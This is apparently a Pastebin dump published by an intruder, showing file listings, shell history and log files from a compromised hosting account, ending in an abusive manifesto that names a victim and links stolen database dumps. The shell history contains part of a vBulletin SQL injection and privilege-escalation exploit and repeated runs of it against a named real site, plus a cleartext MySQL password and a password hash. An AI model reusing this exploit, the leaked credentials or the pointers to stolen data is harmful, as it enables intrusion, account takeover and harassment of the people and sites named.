  897. 35897374 lrwxrwxrwx   1 nopasara nopasara       34 Dec 10  2008 access-logs -> /usr/local/apache/domlogs/nopasara/
  898. 35946500 drwxr-xr-x   2 nopasara nopasara     4096 Nov 25 15:44 backups/
  899. 35897650 -rw-r-----   1 nopasara nopasara        1 Dec 27  2008 cpbackup-exclude.conf
  900. 36209930 drwxr-xr-x   3 nopasara nopasara     4096 Jul 26  2009 default/
  901. 35897906 drwxr-xr-x   2 nopasara nopasara     4096 Apr 12  2009 docs/
  902. 35897349 drwxr-x---   3 nopasara mail         4096 Feb  6 16:07 etc/
  903. 36044801 drwx------   2 nopasara nopasara    12288 Feb 28 15:20 logs/
  904. 35897351 drwxrwx---   7 nopasara nopasara     4096 Apr 21  2010 mail/
  905. 35963400 drwxr-xr-x   2 nopasara nopasara     4096 Jan 16  2010 mysql/
  906. 35898497 -rw-r--r--   1 nopasara nopasara  4128921 Jan 10  2010 nopasara_blog.sql
  907. 35897470 -rw-r--r--   1 nopasara nopasara   723362 Feb 13 18:25 nopasara_emea.sql
  908. 35897856 -rw-r--r--   1 nopasara nopasara    38813 Feb 15 13:28 php.ini
  909. 35932502 drwxr-xr-x   3 nopasara nopasara     4096 Jan 27  2010 procedures/
  910. 35897355 drwxr-xr-x   3 nopasara nopasara     4096 Nov  6  2005 public_ftp/
  911. 35897352 drwxr-x---  22 nopasara nobody       4096 Feb 28 01:31 public_html/
  912. 35898505 -rw-r--r--   1 nopasara nopasara 23699498 Jan 18  2010 sverdlov.sql
  913. 35913892 drwxr-xr-x   2 nopasara nopasara     4096 May 20  2009 test/
  914. 35897350 drwxr-xr-x   7 nopasara nopasara     4096 Mar  4 11:07 tmp/
  915. 35897358 lrwxrwxrwx   1 nopasara nopasara       11 Dec 10  2008 www -> public_html/
  916.  
  917.  
  918. nopasara@oss.bg [/home/nopasara/public_html]# ls -lia
  919. total 2286196
  920. 35897352 drwxr-x--- 22 nopasara nobody         4096 Feb 28 01:31 ./
  921. 35897345 drwx--x--x 18 nopasara nopasara       4096 Mar 12 14:04 ../
  922. 35897364 -rw-r--r--  1 nopasara nopasara          0 Feb 13 23:17 .htaccess
  923. 35967226 drwxr-xr-x  2 nopasara nopasara       4096 Jul  5  2009 _notes/
  924. 35897444 drwxr-xr-x  6 nopasara nopasara       4096 Jan 16 15:28 bgsecrets.com/
  925. 35947140 drwxr-xr-x  2 nopasara nopasara       4096 Feb 19 02:32 blog/
  926. 35947141 drwxr-xr-x  2 nopasara nopasara       4096 Feb 19 02:32 cdn/
  927. 37601282 drwxr-xr-x  2 nopasara nopasara       4096 Oct  4 18:47 cgi-bin/
  928. 35947142 drwxr-xr-x  2 nopasara nopasara       4096 Feb 19 02:32 cmdb/
  929. 35947139 drwxr-xr-x  2 nopasara nopasara       4096 Feb 19 02:32 crm/
  930. 36129979 drwxr-xr-x 10 nopasara nopasara       4096 Jan 12  2010 demo/
  931. 35930169 drwxr-xr-x  5 nopasara nopasara       4096 Mar 17 12:35 emeastudio/
  932. 35947143 drwxr-xr-x  2 nopasara nopasara       4096 Feb 19 02:32 eye/
  933. 35897426 -rw-r--r--  1 nopasara nopasara          0 Feb 13 23:17 index.php
  934. 35980080 drwxr-xr-x  6 nopasara nopasara       4096 Jan 28 12:07 ioscompatible.com/
  935. 35897530 -rw-r--r--  1 nopasara nopasara 2338684928 Feb 28 01:23 nfs.iso
  936. 37751973 drwxr-xr-x  3 nopasara nopasara       4096 Jan  6 21:24 png/
  937. 36094784 drwxr-xr-x  8 nopasara nopasara       4096 Mar 20 02:37 securityguy/
  938. 35948620 drwxr-xr-x  5 nopasara nopasara       4096 Mar  5 01:53 studioburgas/
  939. 36241410 drwxr-xr-x  8 nopasara nopasara       4096 Feb  6 15:19 sverdlov.net/
  940. 35964452 drwxr-xr-x  2 nopasara nopasara       4096 Jan 30 23:07 test/
  941. 35930404 drwxr-xr-x  5 nopasara nopasara       4096 Dec 29 21:25 topusahostingproviders.com/
  942. 35914083 drwxr-xr-x  3 nopasara nopasara       4096 Jan  7 01:53 tragedyworld.com/
  943. 35897467 drwxr-xr-x  6 nopasara nopasara       4096 Jan  6 21:25 web/
  944. 36144507 drwxr-xr-x 11 nopasara nopasara       4096 Jul  5  2010 wo/
  945.  
  946.  
  947. nopasara@oss.bg [/home/nopasara/public_html/securityguy]# ls -lia
  948. total 5722468
  949. 36094784 drwxr-xr-x  8 nopasara nopasara       4096 Mar 20 02:37 ./
  950. 35897352 drwxr-x--- 22 nopasara nobody         4096 Feb 28 01:31 ../
  951. 36094811 -rw-------  1 nopasara nopasara         16 Mar  7 01:54 .ftpquota
  952. 36094012 -rw-r--r--  1 nopasara nopasara       3987 Mar  2 01:23 .htaccess
  953. 37093607 drwxr-xr-x  2 nopasara nopasara       4096 Jan 26  2010 cgi-bin/
  954. 36094022 -rw-r--r--  1 nopasara nopasara 1468465152 Nov 21  2009 dni.avi
  955. 36094931 -rw-r--r--  1 nopasara nopasara        397 Mar  2 01:21 index.php
  956. 37322753 drwxr-xr-x  7 nopasara nopasara       4096 Nov  9  2009 leech/
  957. 36094114 -rw-r--r--  1 nopasara nopasara      15606 Mar  2 01:21 license.txt
  958. 36094164 -rw-r--r--  1 nopasara nopasara        210 Jan  7 02:58 php.ini
  959. 36094115 -rw-r--r--  1 nopasara nopasara       9200 Mar  2 01:21 readme.html
  960. 36094934 -rw-r--r--  1 nopasara nopasara         27 Sep 27  2009 robots.txt
  961. 36094031 -rw-r--r--  1 nopasara nopasara        388 Dec  1  2009 start.png
  962. 36978690 drwxr-xr-x  3 nopasara nopasara       4096 Dec  1  2009 task/
  963. 36094935 -rw-r--r--  1 nopasara nopasara    5612818 Sep 27  2009 webtech_2009.tar.gz
  964. 36094061 -rw-r--r--  1 nopasara nopasara       4337 Mar  2 01:21 wp-activate.php
  965. 36094786 drwxr-xr-x  9 nopasara nopasara       4096 Mar  2 01:21 wp-admin/
  966. 36095227 -rw-r--r--  1 nopasara nopasara      40283 Mar  2 01:21 wp-app.php
  967. 36095228 -rw-r--r--  1 nopasara nopasara        226 Mar  2 01:21 wp-atom.php
  968. 36095229 -rw-r--r--  1 nopasara nopasara        274 Mar  2 01:21 wp-blog-header.php
  969. 36095230 -rw-r--r--  1 nopasara nopasara       3931 Mar  2 01:21 wp-comments-post.php
  970. 36095231 -rw-r--r--  1 nopasara nopasara        244 Mar  2 01:21 wp-commentsrss2.php
  971. 36095232 -rw-r--r--  1 nopasara nopasara       3177 Mar  2 01:21 wp-config-sample.php
  972. 36095233 -rw-r--r--  1 nopasara nopasara       1742 Mar  2 01:21 wp-config.php
  973. 36094792 drwxr-xr-x  7 nopasara nopasara       4096 Mar  2 01:25 wp-content/
  974. 36095718 -rw-r--r--  1 nopasara nopasara       1255 Mar  2 01:21 wp-cron.php
  975. 36095719 -rw-r--r--  1 nopasara nopasara        246 Mar  2 01:21 wp-feed.php
  976. 36094858 drwxr-xr-x  8 nopasara nopasara       4096 Mar  2 01:21 wp-includes/
  977. 36096099 -rw-r--r--  1 nopasara nopasara       1997 Mar  2 01:21 wp-links-opml.php
  978. 36096100 -rw-r--r--  1 nopasara nopasara       2453 Mar  2 01:21 wp-load.php
  979. 36096101 -rw-r--r--  1 nopasara nopasara      27787 Mar  2 01:21 wp-login.php
  980. 36096102 -rw-r--r--  1 nopasara nopasara       7774 Mar  2 01:21 wp-mail.php
  981. 36096103 -rw-r--r--  1 nopasara nopasara        494 Mar  2 01:21 wp-pass.php
  982. 36094141 -rw-r--r--  1 nopasara nopasara     110415 Mar  2 01:21 wp-pdf.php
  983. 36096104 -rw-r--r--  1 nopasara nopasara        224 Mar  2 01:21 wp-rdf.php
  984. 36096105 -rw-r--r--  1 nopasara nopasara        334 Mar  2 01:21 wp-register.php
  985. 36096106 -rw-r--r--  1 nopasara nopasara        224 Mar  2 01:21 wp-rss.php
  986. 36096107 -rw-r--r--  1 nopasara nopasara        226 Mar  2 01:21 wp-rss2.php
  987. 36096108 -rw-r--r--  1 nopasara nopasara       9655 Mar  2 01:21 wp-settings.php
  988. 36094025 -rw-r--r--  1 nopasara nopasara      18644 Mar  2 01:21 wp-signup.php
  989. 36096109 -rw-r--r--  1 nopasara nopasara       3702 Mar  2 01:21 wp-trackback.php
  990. 36096110 -rw-r--r--  1 nopasara nopasara       3210 Mar  2 01:21 xmlrpc.php
  991. 36094150 -rw-r--r--  1 nopasara nopasara 4379590656 Sep 10  2010 xorred.iso
  992.  
  993.  
  994. nopasara@oss.bg [/home/nopasara]# cat .bash_history
  995. #1263692240
  996. cd public_html/
  997. #1263692243
  998. test.php
  999. #1263692248
  1000. php test.php
  1001. #1263692260
  1002. php test.php <?php
  1003. #1263692260
  1004. print_r('
  1005. -----------------------------------------------------------------------------
  1006. vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege
  1007. escalation by session hijacking exploit
  1008. by rgod
  1009. mail: retrog at alice dot it
  1010. site: http://retrogod.altervista.org
  1011.  
  1012. Works regardless of php.ini settings, you need a Super Moderator account
  1013. to copy posts among threads, to be launched while admin is logged in to
  1014. the control panel, this will give you full admin privileges
  1015. note: this will flood the forum with empty threads even!
  1016. -----------------------------------------------------------------------------
  1017. ');
  1018. #1263692260
  1019. if ($argc<7) {
  1020. #1263692260
  1021. print_r('
  1022. -----------------------------------------------------------------------------
  1023. Usage: php '.$argv[0].' host path user pass forumid postid OPTIONS
  1024. host:      target server (ip/hostname)
  1025. path:      path to vbulletin
  1026. user/pass: you need a moderator account
  1027. forumid:   existing forum
  1028. postid:    existing post
  1029. Options:
  1030.  -p[port]:    specify a port other than 80
  1031.  -P[ip:port]: specify a proxy
  1032. Example:
  1033. php '.$argv[0].' localhost /vbulletin/ rgod mypass 2 121 -P1.1.1.1:80
  1034. php '.$argv[0].' localhost /vbulletin/ rgod mypass 1 143 -p81
  1035. -----------------------------------------------------------------------------
  1036. ');
  1037. #1263692260
  1038. die;
  1039. #1263692260
  1040. }
  1041. #1263692260
  1042. /*
  1043. #1263692260
  1044. vulnerable code in inlinemod.php near lines 185-209:
  1045. #1263692260
  1046. ...
  1047. #1263692260
  1048.  
  1049. #1263692260
  1050. ->GPC['postids']);
  1051. #1263692260
  1052. dex => $postid)
  1053. #1263692260
  1054. dex"] != intval($postid))
  1055. {
  1056. unset($postids["$index"]);
  1057. }
  1058. }
  1059.  
  1060. if (empty($postids))
  1061. {
  1062. #1263692279
  1063. php test.php
  1064. #1263692305
  1065. php test.php studiopress.com/support sverdlov sverdlovparola 42 15513
  1066. #1263692308
  1067. php test.php studiopress.com/support sverdlov sverdlovparola 42 15513
  1068. #1263692321
  1069. php test.php studiopress.com/support/ sverdlov sverdlovparola 42 15513
  1070. #1263692381
  1071. php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
  1072. #1263692470
  1073. php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
  1074. #1263692489
  1075. Administrator
  1076. #1263692493
  1077. Administrator
  1078. #1263692496
  1079. php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
  1080. #1263692539
  1081. cd ..
  1082. #1263692540
  1083. ls
  1084. #1263692547
  1085. rm .bash_history
  1086. #1263692551
  1087. cat .bash_h
  1088. #1263692557
  1089. exit
  1090. #1263831540
  1091. mysql -h127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < /home/nopasara//public_html/sverdlov.net/sverdlov.sql
  1092. #1263831932
  1093. mysql -h127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < /home/nopasara//public_html/sverdlov.net/sverdlov1.sql
  1094. #1263833103
  1095. exit
  1096. #1263832465
  1097. ls -la
  1098. #1263832469
  1099. ls -la
  1100. #1263832491
  1101. vim .bash_history
  1102. #1263832552
  1103. mysql -h 127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < sverdlov.sql
  1104. #1263832751
  1105. mysql --help|grep charset
  1106. #1263832754
  1107. mysql --help|grep char
  1108. #1263832908
  1109. cd public_html/
  1110. #1263832909
  1111. ls
  1112. #1263832912
  1113. cd sverdlov.net/
  1114. #1263832912
  1115. ls
  1116. #1263832923
  1117. vim wp-config.php
  1118. #1263837320
  1119. logou
  1120. #1263837322
  1121. logout
  1122. uname -a;w;id
  1123. cd /home/nopasara
  1124. ls -l
  1125. du -hs .
  1126. cd /home/nopasara
  1127. ls -lia
  1128.  
  1129.  
  1130. >> LOL, You're doing it wrong, idiot.
  1131.  
  1132. nopasara@oss.bg [/home/nopasara/.htpasswds/public_html/securityguy/leech]# cat passwd
  1133. leech:204VnKl0pmERM
  1134.  
  1135.  
  1136. nopasara@oss.bg [/home/nopasara]# ls -l docs
  1137. total 36044
  1138. drwxr-xr-x  2 nopasara nopasara    4096 Apr 12  2009 ./
  1139. drwx--x--x 18 nopasara nopasara    4096 Mar 20 03:01 ../
  1140. -rw-r--r--  1 nopasara nopasara 1589323 Apr 12  2009 NIST-SP800-42.pdf
  1141. -rw-------  1 nopasara nopasara 1224696 Jan 14  2009 auditing_mac_os_x_compliance_with_the_center_for_internet_security_benchmark_using_nessus_32948
  1142. -rw-------  1 nopasara nopasara  925291 Jan 14  2009 cleaning_up_the_back_yard_a_discussion_on_your_mothers_home_network_security_32933
  1143. -rw-------  1 nopasara nopasara  903941 Jan 14  2009 covering_the_tracks_on_mac_os_x_leopard_32993
  1144. -rw-------  1 nopasara nopasara 1000759 Jan 14  2009 current_issues_in_dns_32988
  1145. -rw-------  1 nopasara nopasara  883280 Jan 14  2009 data_carving_concepts_32969
  1146. -rw-------  1 nopasara nopasara  504518 Jan 14  2009 detecting_and_preventing_anonymous_proxy_usage_32943
  1147. -rw-------  1 nopasara nopasara 1856536 Jan 14  2009 document_metadata_the_silent_killer_32974
  1148. -rw-------  1 nopasara nopasara 3193150 Jan 14  2009 era_of_spybots_a_secure_design_solution_using_intrusion_prevention_systems_32928
  1149. -rw-------  1 nopasara nopasara  825947 Jan 14  2009 evtx_and_windows_event_logging_32949
  1150. -rw-------  1 nopasara nopasara 6815322 Jan 14  2009 fibre_channel_storage_area_networks_an_analysis_from_a_security_perspective_32913
  1151. -rw-------  1 nopasara nopasara 2014858 Jan 14  2009 human_being_firewall_32998
  1152. -rw-------  1 nopasara nopasara  631031 Jan 14  2009 intel_ixp_network_processor_based_intrusion_detection_32919
  1153. -rw-------  1 nopasara nopasara  343988 Jan 14  2009 intrusion_detection_likelihood_a_riskbased_approach_32938
  1154. -rw-------  1 nopasara nopasara  516554 Jan 14  2009 iosmap_tcp_and_udp_port_scanning_on_cisco_ios_platforms_32964
  1155. -rw-------  1 nopasara nopasara  426055 Jan 14  2009 manager_bg_2009.pdf
  1156. -rw-------  1 nopasara nopasara  461473 Jan 14  2009 mining_for_malware_theres_gold_in_them_thar_proxy_logs_32959
  1157. -rw-------  1 nopasara nopasara  808979 Jan 14  2009 net_framework_rootkits_backdoors_inside_your_framework_32954
  1158. -rw-------  1 nopasara nopasara  981363 Jan 14  2009 os_and_application_fingerprinting_techniques_32923
  1159. -rw-------  1 nopasara nopasara 1083363 Jan 14  2009 paper32988.pdf
  1160. -rw-------  1 nopasara nopasara 1574638 Jan 14  2009 security_considerations_for_avaya_ess_implementation_32984
  1161. -rw-------  1 nopasara nopasara  485204 Jan 14  2009 security_incident_handling_in_small_organizations_32979
  1162. -rw-------  1 nopasara nopasara  482489 Jan 14  2009 skype_a_practical_security_analysis_32918
  1163. -rw-------  1 nopasara nopasara  470634 Jan 14  2009 social_engineering_manipulating_the_source_32914
  1164. -rw-------  1 nopasara nopasara  732651 Jan 14  2009 the_importance_of_security_awareness_training_33013
  1165. -rw-------  1 nopasara nopasara 1143981 Jan 14  2009 transparent_layer_2_firewalls_a_look_at_2_vendor_offerings_juniper_and_cisco_32978
  1166. -rw-------  1 nopasara nopasara 4844265 Jan 14  2009 valsmith_dquist_hacking_malware.pdf
  1167.  
  1168.  
  1169. nopasara@oss.bg [/home/nopasara]# ls -l /usr/local/apache/domlogs/nopasara/
  1170. total 128288
  1171. drwxr-x---   2 root nopasara      4096 Feb 28 14:26 ./
  1172. drwx--x--x 654 root wheel       765952 Mar 20 03:03 ../
  1173. -rw-r-----   2 root nopasara     39096 Mar 20 01:19 bgsecrets.oss.bg
  1174. -rw-r-----   2 root nopasara    294111 Jul 10  2009 blog.nopasara.bg
  1175. -rw-r-----   2 root nopasara      6791 Mar 16 21:06 blog.oss.bg
  1176. -rw-r-----   2 root nopasara     15280 Mar 16 21:22 cdn.oss.bg
  1177. -rw-r-----   2 root nopasara    927221 Jul  4  2009 cmdb.nopasara.bg
  1178. -rw-r-----   2 root nopasara         0 Jan 31  2010 cmdb.oss.bg
  1179. -rw-r-----   2 root nopasara    227423 Jul  4  2009 crm.nopasara.bg
  1180. -rw-r-----   2 root nopasara         0 Jan 31  2010 crm.oss.bg
  1181. -rw-r-----   2 root nopasara    101328 Mar 20 02:10 demo.oss.bg
  1182. -rw-r-----   2 root nopasara   2399652 Mar 20 01:57 emeastudio.oss.bg
  1183. -rw-r-----   2 root nopasara         0 Jan 31 00:25 eye.oss.bg
  1184. -rw-r-----   2 root nopasara         0 Aug 31  2009 ftp.nopasara.bg-ftp_log
  1185. -rw-r-----   2 root nopasara 111685373 Mar 17 12:56 ftp.oss.bg-ftp_log
  1186. -rw-r-----   2 root nopasara     29481 Dec 28  2009 hipopotuk.oss.bg
  1187. -rw-r-----   2 root nopasara     80008 Mar 20 01:44 ioscompatible.oss.bg
  1188. -rw-r-----   2 root nopasara    121645 Oct  3 13:24 logostudio.oss.bg
  1189. -rw-r-----   2 root nopasara         0 Aug 31  2009 nopasara.bg
  1190. -rw-r-----   2 root nopasara     39153 Sep 16  2009 nopasara.oss.bg
  1191. -rw-r-----   2 root nopasara         0 Dec 10  2008 nopasaran.bg
  1192. -rw-r-----   2 root nopasara    259906 Mar 20 02:54 oss.bg
  1193. -rw-r-----   2 root nopasara    104114 Feb  5 11:21 osseu.oss.bg
  1194. -rw-r-----   2 root nopasara         0 Jun 30  2009 play.nopasara.bg
  1195. -rw-r-----   2 root nopasara         0 Jul 10  2009 play.oss.bg
  1196. -rw-r-----   2 root nopasara  10374402 Mar 20 03:02 securityguy.oss.bg
  1197. -rw-r--r--   2 root root        375448 Jul 28  2009 studio.oss.bg
  1198. -rw-r-----   2 root nopasara     74486 Mar 19 20:47 studioburgas.oss.bg
  1199. -rw-r-----   2 root nopasara    729044 Jul  4  2009 support.nopasara.bg
  1200. -rw-r-----   2 root nopasara         0 Jul 10  2009 support.oss.bg
  1201. -rw-r-----   2 root nopasara   2114965 Mar 20 02:54 sverdlov.oss.bg
  1202. -rw-r-----   2 root nopasara     72848 Mar 20 02:42 test.oss.bg
  1203. -rw-r-----   2 root nopasara         0 Jan 31 00:25 topusahostingproviders.oss.bg
  1204. -rw-r-----   2 root nopasara         0 Jan 31 00:25 tragedyworld.oss.bg
  1205. -rw-r-----   2 root nopasara    141532 Mar 20 02:53 web.oss.bg
  1206. -rw-r-----   2 root nopasara       140 Aug  1  2009 weboffice.oss.bg
  1207. -rw-r-----   2 root nopasara    137076 Mar 16 02:38 wo.oss.bg
  1208.  
  1209.  
  1210. >> Check the URL for database dumps, etc.
  1211.  
  1212.  
  1213.  
  1214.  
  1215. Fuck the skiddies, fuck the pseudo-security experts like Sverdlov, and last but not least.. fuck the cops and the stupid journalists brainwashing the innocent.
  1216.  
  1217. Here's the URL for the various dumps -
  1218. http://www.4shared.com/file/sy8bdPe5/pwnt4phun.html
  1219.  
  1220. Get back to pr0n4all@hush.ai for non-published details, packet captures, some more database dumps, etc.
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top